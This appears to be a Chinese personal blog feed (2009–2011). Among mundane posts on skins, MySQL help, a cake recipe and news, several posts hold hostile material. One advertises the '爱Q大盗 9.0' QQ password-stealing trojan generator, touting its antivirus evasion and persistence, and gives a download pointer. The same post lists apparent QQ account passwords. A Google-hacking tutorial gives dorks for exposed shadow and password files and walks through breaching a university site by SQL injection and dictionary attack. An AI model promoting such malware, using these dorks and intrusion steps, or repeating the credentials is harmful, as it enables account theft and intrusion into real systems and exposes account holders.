广交天下博友! 快乐分享
( Thu, 3 Feb 2011 22:11:28 +0800 )
Description:
本人新注册的360免费网站:
点击看效果!很棒的免费网站!
360免费建站为中小企业提供免费的空间和全球最先进的建站技术,拥有丰富的网站模板,具备自助建站
的简单操作特点,网站功能强大,为中小企业免费建立网上宣传平台,从而帮助中小企业生意更好、赚钱更多。是中小企业网站建设的最佳选择!
360免费自助建站—国内领先的在线企业建站平台!
“会打字就能建网站”,一个会简单计算机操作的人只要几分钟就能快速生成一个企业网站,甚至是各类门户网站。这就是360免费自助建站所提出的网站建设理念。
产品特点
永久免费的建站
360建站以免费方式提供企业建站平台,最大限度为企业节省建站成本,同时创造一种新型的企业网站创建方式。
齐全的功能模块
360建站提供产品展示、新闻发布、在线***,企业相册等多达十几项的功能模块,充分满足企业建站需求。
简单的建站操作
可视化拖拽,会操作鼠标即会建站;所见即所得,无需掌握专业美工知识即可获得理想效果!
有效的网站推广
搜索引擎优化、商机推送、万网联盟、友情链接,提高网站曝光率,收获更多潜在客户关注!
灵活个性化设置
让您的网站与众不同,突显企业个性特色,模板招牌、通栏、橱窗、背景等,通通可以自定义。
高效的管理
信息发布、产品更新,客户留言,浏览数据等,让您管理网站快捷方便,得心应手!
先进的技术保障
产品功能不断升级,持续满足客户需求;专业的网站运维团队,网站运营24小时有保障。 360免费自助建站: 注册地址:
原文地址:
( Wed, 2 Feb 2011 13:16:16 +0800 )
Description:
(这个远控木马可过国内所有主流国产杀毒软件,绝对真实.本人亲历。)今日本人无聊上网!时间是2011年2月1日,发现网上有个别网站有兜售免杀远程控制的,网址是这个:
。经过本人于卖家的商议!确定牺牲一下我的电脑做测试!过杀软后又可控制本人电脑后决定购买,同意后卖家发过被控制端。
如图:
于是本人用360做杀毒测试结果令我瞠目《无毒》!这是后门程序吗?
测试结果看图:
我还是有点不相信,于是我又打多引擎在线病毒扫描网
网址是:
,《以后大家有不确定有没有毒的程序可以来这里检测》
经多引擎在线病毒扫描网测试,37款杀毒引擎.只有6款报毒.总测试结果为无毒!
如图:
通过以上测试我确定他是一个新型木马,检测不报毒不等于没毒。于是我双击了被控制端立刻看见了我的鼠标在不停的闪烁,鼠标在卖家的手里自由发挥,我惊呆了,我的360今天终于不吱声了.在我同意购买后,卖家卸载了客户端。但我心里还是没底.赶紧在多引擎病毒扫描网看了那6款报毒软件.德国小红伞杀毒软件用时最短.于是我立刻下载小红伞《免费软件》.***后,测试就是厉害,报毒.禁止访问,而且还识别出是后门程序,就是牛X!呵呵!和360又能和谐相处,这回我可不怕了全盘杀毒,小红伞帮我把电脑内的剩余木马全部清除掉了。
如图:
你说牛不牛.后来我想,要是人家将这个木马捆绑上某个软件,上传到大的软件网站,或在某个网站上挂上这样的木马,那后果是可怕的!就像往锅里下饺子!全是人家的菜!坐着,等鸡一群一群的上门啊!大家现在要小心了!下面是这个远控软件的截图:
切忌:看后想买的人!请不要有这个念头!这是个骗人的网站,你可以先去百度搜一下就知道了以免钱财两空!想了解的人我告诉你卖家的QQ; 7729547你可以假装买的让他给你演示一下!别吓着!呵呵!人家的木马还能升级呢。原文地址:
( Mon, 31 May 2010 17:24:25 +0800 )
Description:
javascript:window.top. ace_addItem(14,32669,0,0,1,1,0);
( Fri, 28 May 2010 09:41:54 +0800 )
Description:
Flash地址:
. Flash模块:2
Flash地址:
. Flash模块:3
Flash地址:
. Flash模块:4
Flash地址:
. Flash模块:5
Flash地址:
. Flash模块:6
Flash地址:
. Flash模块:7
Flash地址:
. 图文模块:
图片地址:
. Flash模块:
Flash地址:
. Flash模块:
Flash地址:
. Flash模块:
Flash地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. 大图模块:
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. 大图模块:000000000000
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. 大图模块:0000000000000
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. 大图模块:1
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. Flash模块:
Flash地址:
. 大图模块:00000000000000000000
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. Flash模块:
Flash地址:
. Flash模块:
Flash地址:
. 大图模块:
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. 大图模块:
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
. Flash模块:99999999999
Flash地址:
. 大图模块:
图片地址:
这是QQ空间图片,以下只是预览,源图片请点击链接至QQ官方网查看:
Flash地址:
. Flash模块:小熙动画
Flash地址:
Flash地址:
. Flash模块:
Flash地址:
. Flash模块:
Flash地址:
Flash地址:
. Flash模块:
Flash地址:
. Flash模块:
Flash地址:
Flash地址:
. Flash模块:2009.11.20.2
Flash地址:
. Flash模块:2009.11.20.3
Flash地址:
Flash地址:
. Flash模块:
Flash地址:
. Flash模块: 4
Flash地址:
. Flash模块:2
Flash地址:
. Flash模块:
Flash地址:
( Fri, 30 Apr 2010 18:10:10 +0800 )
Description:
纪念中国体操男团在08年北京奥运会上取得好成绩的QQ空间免费开场白代码。
一款能激发爱国情感的QQ开场白,当中国体操男团登上最高领奖台时,
有一种莫名的感动在心头涌动。
QQ空间代码:javas
cript:window.top. ace_addItem(14,32669,0,0,1,1,0);
代码演示效果:
如果想获得最新的QQ空间免费代码,请收藏我们的网站, 谢谢!
( Tue, 27 Apr 2010 16:13:32 +0800 )
Description:
整理出了一批漂亮的免费QQ秀,都是在腾讯QQ秀商城里能直接穿的,部分为动态QQ秀。目前基本上都能用,不保证以后不会过期。不是QQ红钻的用户赶紧领取。来源:
http://show.qq.com/p/f?t=13&am i=985118&am u=601536029
http://show.qq.com/p/f?t=13&am i=984888&am u=601536029
http://show.qq.com/p/f?t=13&am i=984906&am u=601536029
http://show.qq.com/p/f?t=13&am i=985126&am u=601536029
http://show.qq.com/p/f?t=13&am i=984935&am u=601536029
http://show.qq.com/p/f?t=13&am i=985124&am u=601536029
http://show.qq.com/p/f?t=13&am i=985125&am u=601536029
http://show.qq.com/p/f?t=13&am i=984924&am u=601536029
http://show.qq.com/p/f?t=13&am i=984925&am u=601536029
http://show.qq.com/p/f?t=13&am i=984930&am u=601536029
http://show.qq.com/p/f?t=13&am i=984939&am u=601536029
http://show.qq.com/p/f?t=13&am i=984944&am u=601536029
http://show.qq.com/p/f?t=13&am i=984947&am u=601536029
http://show.qq.com/p/f?t=13&am i=984948&am u=601536029
http://show.qq.com/p/f?t=13&am i=984878&am u=601536029
http://show.qq.com/p/f?t=13&am i=984905&am u=601536029
http://show.qq.com/p/f?t=13&am i=984898&am u=601536029
http://show.qq.com/p/f?t=13&am i=984903&am u=601536029
http://show.qq.com/p/f?t=13&am i=985119&am u=601536029
http://show.qq.com/p/f?t=13&am i=985130&am u=601536029
http://show.qq.com/p/f?t=13&am i=985131&am u=601536029
http://show.qq.com/p/f?t=13&am i=985134&am u=601536029
http://show.qq.com/p/f?t=13&am i=985132&am u=601536029
http://show.qq.com/p/f?t=13&am i=985133&am u=601536029
http://show.qq.com/p/f?t=13&am i=985127&am u=601536029
http://show.qq.com/p/f?t=13&am i=984895&am u=601536029
http://show.qq.com/p/f?t=13&am i=985129&am u=601536029
http://show.qq.com/p/f?t=13&am i=985128&am u=601536029
http://show.qq.com/p/f?t=13&am i=984922&am u=601536029
http://show.qq.com/p/f?t=13&am i=984919&am u=601536029
http://show.qq.com/p/f?t=13&am i=984920&am u=601536029
http://show.qq.com/p/f?t=13&am i=984917&am u=601536029
http://show.qq.com/p/f?t=13&am i=984921&am u=601536029
http://show.qq.com/p/f?t=13&am i=984923&am u=601536029
http://show.qq.com/p/f?t=13&am i=984911&am u=601536029
http://show.qq.com/p/f?t=13&am i=984909&am u=601536029
http://show.qq.com/p/f?t=13&am i=984933&am u=601536029
http://show.qq.com/p/f?t=13&am i=984932&am u=601536029
http://show.qq.com/p/f?t=13&am i=984946&am u=601536029
http://show.qq.com/p/f?t=13&am i=984943&am u=601536029
http://show.qq.com/p/f?t=13&am i=984941&am u=601536029
http://show.qq.com/p/f?t=13&am i=984937&am u=601536029
上面的免费QQ秀,价格均为0。可以直接免费穿。
更多更好的免费资源请进: 水中望月的免费资源网!
( Tue, 27 Apr 2010 16:03:10 +0800 )
Description: 1.QQ空间黑色免费皮肤代码,全黑带小白点:
cript:window.top. ace_addItem(1,26498,80,0,0,0,93);
2.最新非主流女生QQ空间免费皮肤代码:
cript:window.top. ace_addItem(1,9475,0,0,1,1,94);
3.QQ空间草原免费皮肤代码,唯美蓝天草原:
cript:window.top. ace_addItem(1,7619,0,80,0,0,94);
4.QQ空间情侣免费皮肤代码,梦幻情侣淡粉色背景:
cript:window.top. ace_addItem(1,7513,0,80,0,0,94);
5.QQ空间紫光免费皮肤代码,淡紫色星空:
cript:window.top. ace_addItem(1,7510,0,80,0,0,94);
6.QQ空间淡粉色免费皮肤代码,婚礼玫瑰:
cript:window.top. ace_addItem(1,4693,0,80,0,0,94);
12.粉色免费皮肤代码,小窝模式皮肤
cript:window.top. ace_addItem(1,4693,0,80,0,0,20);
13.全蓝样式qq免费皮肤代码
cript:window.top. ace_addItem(1,15116,0,80,0,0,93);
14.全灰样式qq免费皮肤代码
cript:window.top. ace_addItem(1,10426,0,0,1,1,0);
15.右移全灰小窝QQ免费皮肤代码
cript:window.top. ace_addItem(1,10426,200,80,0,0,20);
乐洁肤绿色皮肤1 javas
cript:window.top. ace_addItem(1,4963,0,0,1,1,0);
乐洁肤绿色皮肤2 javas
cript:window.top. ace_addItem(1,4964,0,0,1,1,0);
效果如下: javas
cript:window.top. ace_addItem(1,32667,0,80,0,0,94); javas
cript:window.top. ace_addItem(1,26341,0,80,0,0,30);
空间效果:
( Sun, 11 Apr 2010 12:44:26 +0800 )
Description:
MSSQL使用帮助
1、如果您的SQL空间开通以后,请打开您本地的SQL server 企业管理器,如下图:
2、点SQL server 组右键,选择新建SQL server 注册,如下图:
3、弹出SQL server 注册向导,点下一步,如下图:
4、可用的服务器填写,您订单中的服务器IP地址,然后点添加,如下图:
5、您添加的服务器IP即可增加到右侧,然后点下一步,如下图:
6、按下图选择连接使用方式,点下一步;
7、按下图所示,按您的订单中显示的SQL用户名和密码,分别填写后,点下一步;
8、完成SQL server 注册,点击完成,如下图:
9、显示注册成功。(如果总是提示失败,请检查您的局域网是否开放了1433端口, 同时检查您的SQL链接超时时间,SQL默认超时时间为4秒,建议改成60秒---在SQL server 企业管理器=工具=选项=高级。)
10、完成SQL server 注册后,在左侧列表中即可看到我们的远程服务器,如下图:
11、点击我们的远程服务器,展开,再展开数据库, 显示出服务器上的数据库列表,请找到您的订单中显示的数据库名称,点击展开,如下图:
12、在表上点击右键,选择所有任务,选择导入数据,如下图所示:
13、弹出数据导入向导,如下图:
14、选择您原来存放数据库的服务器及登陆方法,如下图所示:
15、选择目的,即为本公司的远程服务器,一般下图的内容不用修改;
16、点下一步后,按下图选择,再点下一步;
17、选择您想要导入的表、视图等数据内容,如下图所示:
18、可以点击全选,也可以手动选择;
19、选好后,点击下一步,弹出下面的图示,按提示,点下一步,完成。
20、至此,您已经设置好了数据库,然后修改您程序中的数据库链接,按您订单里面显示的服务器IP地址、数据库名、登陆用户名、登陆密码进行修改,即可进行数据库链接。 使用MySQL-Front的Mysql帮助
MySQL-Front是一款操作简单的mysql远程管理工具,在使用此工具前请先在您本机***Mysql数据库。
下载地址:
MySQL-Front: http://www.newhua.com/soft/33451.a 本教程是以MySQL-Front 3.2为例,***完运行MySQL-Front
1、首先建立连接,点文件---新建(F12)
2、在登录信息的登录名称处随便设置一个名称:
3、然后先在“注册”选项中设置您的mysql的用户名、密码和数据库名
4、接下来在“连接”选项中设置连接到本站服务器的IP地址:
5、设置好后点“确定”
6、再点“确定”连接到服务器
7、连接成功后,可以进行很多mysql数据库的管理工作,可以将数据库导出保存,可以对表作各种操作
更多关于MySQL-Front软件的使用帮助请在网上自行查找或到本站知识库查阅,谢谢!
( Mon, 22 Mar 2010 15:16:43 +0800 )
Description:
( Mon, 22 Mar 2010 15:04:07 +0800 )
Description:
你好吗!
( Mon, 22 Mar 2010 14:48:42 +0800 )
Description:
( Thu, 5 Nov 2009 16:58:57 +0800 )
Description:
2009-11-5 10:55:28
来源:新华网
新华网华盛顿11月4日电(记者任海军)美国艾奥瓦州公共卫生部门4日发表声明说,该州一只宠物猫日前感染了甲型H1N1流感病毒,这是美国首次发现猫感染甲型H1N1流感病例。
声明说,这只13岁的猫上周在艾奥瓦州立大学兽医学院接受治疗时,其甲型H1N1流感病毒测试结果呈阳性,艾奥瓦州兽医部门及美国农业部在随后的进一步检测中确认它感染了甲型H1N1流感病毒。
声明指出,目前还不能确定感染甲型H1N1流感的宠物一般会出现什么症状。不过,据曾治疗这只猫的艾奥瓦州立大学兽医学院医生布雷特·斯庞塞勒介绍,这只猫生病前,其所在家庭的3名成员中有两人出现流感样症状,它在生病后嗜睡、食欲不振、呼吸困难。目前这只宠物猫已经康复。
艾奥瓦州公共卫生部门兽医安·加维说,这并非完全出人意料,因为美国过去也曾多次发现猫感染其它类型流感的情况。
美国疾病控制和预防中心10月底公布的数据显示,美国已有48个州暴发甲型H1N1流感疫情,导致1000多人死亡。自疫情今年4月暴发以来,俄勒冈州、内布拉斯加州以及明尼苏达州等多个州曾出现动物感染甲型H1N1流感病例。编辑:文静
( Mon, 12 Oct 2009 20:49:33 +0800 )
Description:
留着,做给父母吃,做给我爱的人吃。
准备好材料:面粉,鸡蛋,牛奶,盐,糖,油
注意:这个过程不能沾一滴水,器皿都擦干再用哦。
按量打蛋,在这里我用了4个,
蛋清分离
三根筷子准备打蛋清
打两下就这样了
为了突出甜,放一点点盐
一勺糖
继续打继续打继续打
有点稠时再放一勺糖,继续打
大约15分钟后,就会变成奶油状,而且筷子上的不会掉下来
这个过程比较关键,15分钟连续打,不是闹着玩的,很痛苦滴
蛋黄里放两勺糖
3勺冒尖的面粉
6勺牛奶
搅拌好
倒入一半奶油状的蛋清
注意:上下搅拌而不是打圈
搅拌均匀后再倒入另一半奶油状蛋清,上下搅拌好
电饭煲按下煮饭健预热1分钟后拿出,锅有点热就可以
倒入少许油,均匀涂在锅内,以防粘锅
倒入搅拌好的东西,然后蹲几下锅,把气泡震出来
按下煮饭键,2分钟左右会自动跳到保温档,这时用毛巾捂住通风口,闷20分钟
然后再按下煮饭键,20分钟后就OK啦
开盖咯
锅内涂了油,一倒就出来啦,蛋糕底部颜色比较深
松软可口的蛋糕,大功告成啦!掌声响起来 ( Wed, 30 Sep 2009 21:31:57 +0800 )
Description:
今天,我在网易花园里为mwh6660423种了一朵小蓝花。希望它给我们带来幸福和爱,直到永远...
( Fri, 26 Jun 2009 22:00:05 +0800 )
Description: 这是一个动画图片制作的网站:
( Tue, 23 Jun 2009 21:05:06 +0800 )
Description: 图标制作网址: 这是一个动画图片制作的网站:
( Mon, 4 May 2009 00:21:13 +0800 )
Description:
爱Q大盗 9.0木马生成器! 爱Q大盗 9.0正式版
经过体验版的测试,发现爱Q大盗 9.0 的BUG,几天的修复和测试,正式版已经现在发出。
真正的经得起后门检查的木马.
本次更新:
1.修正了发送空白邮件的BUG
2.加强了自身防御系统
3.增加感染文件夹功能(同样感染U盘文件夹)
4.修正代码和支持同时混合使用 QQ2008和QQ2009
5.修正部分因为为未知原因无法发送邮件的情况
6.增加了显示IP 功能
爱Q大盗 9.0 正式版 新特性.
1,9.0 已经放弃对原密码的截获了,这是一个QQ木马史的创举,盗取的是加密后的密码,但是同样可以在任意地方登陆QQ。
原因很简单:QQ密码已经不重要了,2代保,你没密保盗不了。
2,9.0 将完美兼容目前所有版本 。
3,采用主动记录技术,但在使用新手法完美突破保险箱的拦截(保险箱完全没有任何提示,完美过 360 等。。。)。
4,采用了反查毒,反杀毒,反删除技术。
5,采用了多重启动复活。(感染加隐蔽写注册表) 6,大量运用 禁止杀软扫描技术,禁止删除注册表技术。
7,无需重新登陆QQ就能获取密码
8.驱动保护(可选择)+双进程守护+无DLL隐藏进程(new~)
9.感染全盘文件夹技术(可选择)(new~) 这里在强调一点: 发信的标题建议独一无二,否则会被服务器当作垃圾邮件给过滤掉。 本地下载地址: 教你对付盗号的小方法!
1: 登录QQ事在QQ号前输入十个零再输QQ号!
这样他盗取的QQ号是一段零!呵呵!不应响你的QQ登录
2: 在输入密码时!要小键盘输入一部分!电脑键盘输入一部分.盗号人得到的是你用电脑输入的密码部分! 3:中马后机子运行缓慢!如果QQ被下线!请不要急着登录上线!切记啊!如果正常登录那你的QQ号和密码就进了盗号人的邮箱啦!呵呵!用360杀毒后在上你的QQ!...................OK!
送大家几个QQ号:
839531290----ttn123456a
1165933944------------mwh123456a
976640016-------------123456t
443468400-------------ttn123456b ( Sun, 3 May 2009 23:26:07 +0800 )
Description: 这就是GOOGLE HACK GOOGLE HACK找到了什么!呵呵!谁家门口的网络摄像头啊!
GOOGLE HACK找到的商业街的网络视频!你还可控制哦!抓拍哦!需要下一个小软件!呵呵!
GOOGLE HACK找到的商业街的网络视频上面图的全景
GOOGLE HACK找到的盗QQ号人的ASP邮箱文档!这样很省事啊!哈哈!
googlehacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的we hell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉googlehacking其实并非如此简单...
googlehacking的简单实现
记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dv 6.mdb或co .inc来获得一些站点的敏感信息.其实使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.
intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似.
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.
define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.
filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入:filetype: doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)
查找指定站点的一些基本信息.
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin,用来找管理员登陆的URL不错.allinurl也同inurl类似,可指定多个字符.
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.
对了还有一些操作符也是很有用的:
+把google可能忽略的字列如查询范围
-把某个字忽略
~同意词
.单一的通配符
*通配符,可代表多个字母
""精确查询
下面开始说说实际应用(我个人还是比较习惯用google.com,以下内容均在google上搜索),对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"indexof"etc
intitle:"Indexof".sh_history
intitle:"Indexof".bash_history
intitle:"indexof"pa wd
intitle:"indexof"people.lst
intitle:"indexof"pwd.db
intitle:"indexof"etc/shadow
intitle:"indexof" wd
intitle:"indexof"master.pa wd
intitle:"indexof"htpa wd
"#-FrontPage-"inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的.下面是我找到的一个FreeBSD系统的pa wd文件(我已做过处理):
同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,我们可以用google来找网上使用这套程序的站点:
intext:ZeroBoardfiletype:php
或者使用:
inurl:outlogin.php?_zb_path=site:.jp
来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行操作.我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadminintext:Createnewdatabase
还记得http://www.xxx.com/_vti_bin/..%5C..%5C....m32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:wi tsystem32
前面我们已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(acce 的数据库,m ql、mysql的连接文件等等).举个例子示例一下:
allinurl: data
filetype:mdbinurl:database
filetype:incco inurl:datafiletype:mdb
intitle:"indexof"data//在一些配置不正确的apache+win32的服务器上经常出现这种情况
和上面的原理一样,我们还可以用google来找后台,方法就略了,举一反三即可,毕竟我写这篇文章的目的是让大家了解googlehacking,而不是让你用google去破坏.安全是把双刃剑,关键在于你如何去运用.
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。www.xxxx.com是全国著名大学之一,一次偶然的机会我决定对其站点进行一次测试(文中所涉及该学校的信息均已经过处理,请勿对号入座:).
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中,找到几个该校的几个系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
顺便ping了一下,应该是在不同的服务器.(想想我们学校就那一台可怜的web服务器,大学就是有钱,汗一个)。学校一般都会有不少好的资料,先看看有什么好东西没:
site:xxxx.comfiletype:doc
得到N个不错的doc。先找找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.cominurl:login
site:xxxx.comintitle:管理
超过获得2个管理后台地址:
http://a2.xxxx.com/sys/admin_login.a http://a3.xxxx.com:88/_admin/login_in.a 还算不错,看看服务器上跑的是什么程序:
site:a2.xxxx.comfiletype:a site:a2.xxxx.comfiletype:php
site:a2.xxxx.comfiletype:a x
site:a3.xxxx.comfiletype:a site:.......
a2服务器用的应该是IIS,上面用的是a 的整站程序,还有一个php的论坛
a3服务器也是IIS,a x+a 。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.comintext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞:
site:a2.xxxx.cominurl:file
site:a3.xxxx.cominurl:load
在a2上发现一个上传文件的页面:
http://a2.xxxx.com/sys/uploadfile.a 用IE看了一下,没权限访问。试试注射,
site:a2.xxxx.comfiletype:a 得到N个a 页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽然不高但已足矣,backashell我不太喜欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再说,MD5加密过。一般学校的站点的密码都比较有规律,通常都是域名+***一类的变形,用google搞定吧。
site:xxxx.com//得到N个二级域名
site:xxxx.comintext:*@xxxx.com//得到N个邮件地址,还有邮箱的主人的名字什么的
site:xxxx.comintext:***//N个***
把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一个可能是老师的帐号。登陆上去:
name:网站管理员
pa :a2xxxx7619//说了吧,就是域名+4个数字
要再怎么提权那就不属于本文讨论访问了,呵呵,到此为止。
关于googlehacking的防范
以前我们站的晓风·残月写过一篇躲避google的文章,原理就是通过在站点根目录下建立一个robots.txt以避免网络机器人获得一些敏感的信息,具体大家看原文章:
http://www.4ngel.net/article/26.htm
不过这种方法我个人不推荐,有点此地无银三百两的味道。简单一点的方法就是上google把自己站点的一些信息删除掉,访问这个URL:
http://www.google.com/remove.html
前几天看见又有人讨论用程序来欺骗robot的方法,我觉得可以试试,代码如下:
if(strstr($_SERVER['HTTP_USER_AGENT'],"Googlebot"))
header("HTTP/1.1301");
header("Location:http://www.google.com");
这段时间在国外的一些googlehack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者配合某个脚本漏洞,主要还是靠个人的灵活思维。国外对于googlehack方面的防范也并不是很多,所以大家还是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面,一个intitle:indexof就差不多都出来了:) GOOGLE HACK本地下载地址: ( Sun, 3 May 2009 22:45:06 +0800 )
Description: 第一节、黑客的种类和行为
第二节、黑客应掌握的基本技能
第一章、基本理论和基本知识 第一节、网络安全术语解释
第二节、常用黑客软件用途分类
第三节、学习黑客的基本环境
第一节、黑客的种类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。 无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。 很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。 在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种:
一、学习技术: 互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。 初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
二、伪装自己: 黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。 伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。 如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。
三、发现漏洞: 漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。 黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞: 对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情: 1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统; 2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器; 3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统; 4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情; 5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感!
第二节、黑客应掌握的基本技能 从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文: 学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。
二、学会基本软件的使用: 这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。
